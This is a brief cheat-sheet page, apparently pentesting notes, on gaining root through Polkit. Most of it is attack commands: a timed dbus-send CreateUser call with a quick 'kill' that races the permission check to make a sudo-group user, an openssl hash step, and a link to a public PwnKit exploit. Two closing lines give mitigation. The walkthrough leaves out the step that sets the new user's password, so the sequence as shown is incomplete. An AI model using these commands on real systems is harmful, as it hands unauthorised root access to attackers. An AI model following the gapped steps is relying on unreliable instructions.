PolKit Privilege Escalation
Polkit (PolicyKit) is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged ones.
Create a new user by sending a dbus message.
# string:tester: The new user named "tester".
# string:"Tester Account": The description of the new user.
# int32:1: sudo group
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:tester string:"Tester Account" int32:1 & sleep 0.005s; kill $!
Copied!Then check the new user ID (uid).
id tester
uid=1000(tester) gid=1000(tester) groups=1000(tester),27(sudo)
Copied!# -6: SHA512
openssl passwd -6 password123
Copied!Copy the output hash.
Enter the password you created e.g. “password123”. Now change to root .
PwnKit is vulnerability of Polkit to local privilege escalation. There are many exploits available. Below are examples:
https://github.com/Almorabea/pkexec-exploit (this is written by Python)
To avoid the vulnerability, unset setuid from the pkexec executable.
Or simply upgrade the apt packages in most of distributions which are patched for the vulnerability.
References
Last updated